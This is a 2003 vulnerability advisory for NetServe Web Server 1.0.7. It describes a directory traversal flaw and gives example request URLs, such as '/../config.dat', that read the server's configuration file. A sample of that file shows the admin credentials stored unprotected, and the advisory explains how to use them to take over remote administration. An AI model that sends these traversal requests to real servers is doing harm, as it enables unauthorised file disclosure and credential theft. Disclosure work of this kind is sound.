netserve107.txt

` ________________________  
/   
| For Contacts:   
| nimber   
| e-mail: [email protected]   
| [email protected]   
|Home Page: www.nimber.plux.ru   
|ICQ: 132614   
\________________________   
  
Advisory Information:   
=================   
Application : NetServe Web Server   
Date : 17.11.2003   
Vendor Homepage : http://www.starlots.com/netx/index.html   
Versions : 1.0.7 (maybe older)   
Platforms: Windows NT, 95, 98, 2000, and XP.   
Severity : High   
Local : yes   
Remote: yes   
Tested on WinXP and Win2K.  
  
=================  
Advisories: Multiple vulnerability in NetServe 1.0.7  
=================  
The description of a product (from the developer):   
"About NetServe Web Server  
NetServe is a super compact Web Server and File Sharing application for Windows NT, 95, 98, 2000, and XP.  
It's HTTP Web Server can serve all types of files including html, gif and jpeg, actually any files placed in your NetServe directory can be served.  
New key features include Server-Side-Include (SSI) support and CGI/1.1 support giving you the choice of your preferred scripting language,   
including but not limited to; Perl, ASP and PHP, to create your dynamic content. Other features include a fully integrated File Sharing application   
supplying a html front end to allow for directory browsing and download. A html form gives users the ability to upload up-to 5 files simultaneously to any directory.  
With security in mind, NetServe features admin tools that allow you full control of how users accessing your server see the resources available, just some of the   
options include, Access served pages only, allow directory browsing, allow file downloading, and even allow file uploading.  
And of course every action being performed on the NetServe Server is automatically logged, so you can interrogate the logs at a later date for statistics."  
=================  
The contents:  
=================  
+ Advisory Information.  
+ Part 1: Directory traversal vulnerability.   
+ Part 2: Viewing of a configuration servers.  
+ Part 3: Access to the admin password.   
=================  
Part - 1:  
======  
Servers does not filter " /../../ ", that allows to rise on a folder above.  
The found vulnerability allows to look through contents of folders and files.   
Example: http://[victim]/../test/  
Allows to see contents of a folder - /test/  
Example: http://[victim]/../test/test.txt  
Allows to see contents of a file test.txt which is in a folder /test/  
  
Part- 2:  
======  
By default in adjustments servers the folder of a site is in [NetServe Web Server folder]\wwwroot\  
If the admin did not change this adjustment, using the found vulnerability we can receive access to a file of a configuration servers.   
Example:  
http://[victim]/../config.dat  
  
Example of a file:  
================  
EnableCGI True  
EnableRemoteAdmin True  
EnableSSI False  
EnablePasswords True  
IndexFiles index.html index.htm  
SSIAbbrevSize True  
SSIExtensions shtml  
SSIErrorMessage An SSI Error Has Occured  
SSITimeFormat   
AuthenticationType Basic  
Port 80  
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\  
Logging True  
Counter False  
Minimized True  
ActivateOnStart False  
MimeTypes application/mac-binhex40|hqx  
MimeTypes application/msword|doc  
MimeTypes application/octet-stream|bin dms lha lzh exe class  
MimeTypes application/pdf|pdf  
MimeTypes application/postscript|ai eps ps  
MimeTypes application/smil|smi smil  
MimeTypes application/vnd.mif|mif  
MimeTypes application/vnd.ms-asf|asf  
MimeTypes application/vnd.ms-excel|xls  
MimeTypes application/vnd.ms-powerpoint|ppt  
MimeTypes application/x-cdlink|vcd  
MimeTypes application/x-compress|Z  
MimeTypes application/x-cpio|cpio  
MimeTypes application/x-csh|csh  
MimeTypes application/x-director|dcr dir dxr  
MimeTypes application/x-dvi|dvi  
MimeTypes application/x-gtar|gtar  
MimeTypes application/x-gzip|gz  
MimeTypes application/x-javascript|js  
MimeTypes application/x-latex|latex  
MimeTypes application/x-sh|sh  
MimeTypes application/x-shar|shar  
MimeTypes application/x-shockwave-flash|swf  
MimeTypes application/x-stuffit|sit  
MimeTypes application/x-tar|tar  
MimeTypes application/x-tcl|tcl  
MimeTypes application/x-tex|tex  
MimeTypes application/x-texinfo|texinfo texi  
MimeTypes application/x-troff|t tr roff  
MimeTypes application/x-troff-man|man  
MimeTypes application/x-troff-me|me  
MimeTypes application/x-troff-ms|ms  
MimeTypes application/zip|zip  
MimeTypes audio/basic|au snd  
MimeTypes audio/midi|mid midi kar  
MimeTypes audio/mpeg|mpga mp2 mp3  
MimeTypes audio/x-aiff|aif aiff aifc  
MimeTypes audio/x-pn-realaudio|ram rm  
MimeTypes audio/x-realaudio|ra  
MimeTypes audio/x-wav|wav  
MimeTypes image/bmp|bmp  
MimeTypes image/gif|gif  
MimeTypes image/ief|ief  
MimeTypes image/jpeg|jpeg jpg jpe  
MimeTypes image/png|png  
MimeTypes image/tiff|tiff tif  
MimeTypes image/x-cmu-raster|ras  
MimeTypes image/x-portable-anymap|pnm  
MimeTypes image/x-portable-bitmap|pbm  
MimeTypes image/x-portable-graymap|pgm  
MimeTypes image/x-portable-pixmap|ppm  
MimeTypes image/x-rgb|rgb  
MimeTypes image/x-xbitmap|xbm  
MimeTypes image/x-xpixmap|xpm  
MimeTypes image/x-xwindowdump|xwd  
MimeTypes image/x-icon|ico  
MimeTypes model/iges|igs iges  
MimeTypes model/mesh|msh mesh silo  
MimeTypes model/vrml|wrl vrml  
MimeTypes text/css|css  
MimeTypes text/html|html htm  
MimeTypes text/plain|asc txt  
MimeTypes text/richtext|rtx  
MimeTypes text/rtf|rtf  
MimeTypes text/sgml|sgml sgm  
MimeTypes text/tab-separated-values|tsv  
MimeTypes text/xml|xml  
MimeTypes video/mpeg|mpeg mpg mpe  
MimeTypes video/quicktime|qt mov  
MimeTypes video/x-msvideo|avi  
Users nimber|password||bmltYmWyfnZpFXmuYW0=  
Aliases /admin|D:\Program Files\NetServe Web Server\admin  
================  
  
Peart-3:  
======  
Using the above described vulnerability, we can receive the password of the admin for the remote administration servers. It will allow us completely to change a configuration servers!   
The password and login we can see in a file of a configuration, about which there was a   
speech above, config.dat. If you pay attention to last lines, it is possible to see the information,   
necessary to us:  
====[config.dat]====  
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=  
Aliases /admin|D:\Program Files\NetServe Web Server\admin  
====[config.dat]====  
  
As we see a folder, in which is scripts of the admin.  
I want to pay yours of attention, that the password and login are not protected!  
  
=================  
For Contacts:  
nimber  
e-mail: [email protected]  
[email protected]  
Home Page: www.nimber.plux.ru  
ICQ: 132614  
=================  
Gr33tz: ZeT, XSPYD3X, euronymous, JLx, Iww, unix, Demon, mestereeo, Pirog, Corpse, x-a13x, insurrectionist, UnInstall, Kabuto and all my friends.  
Re: krok, 3APA3A, buggzy.  
  
p.s> SORRY for my bad english ;)  
_EOF_   
`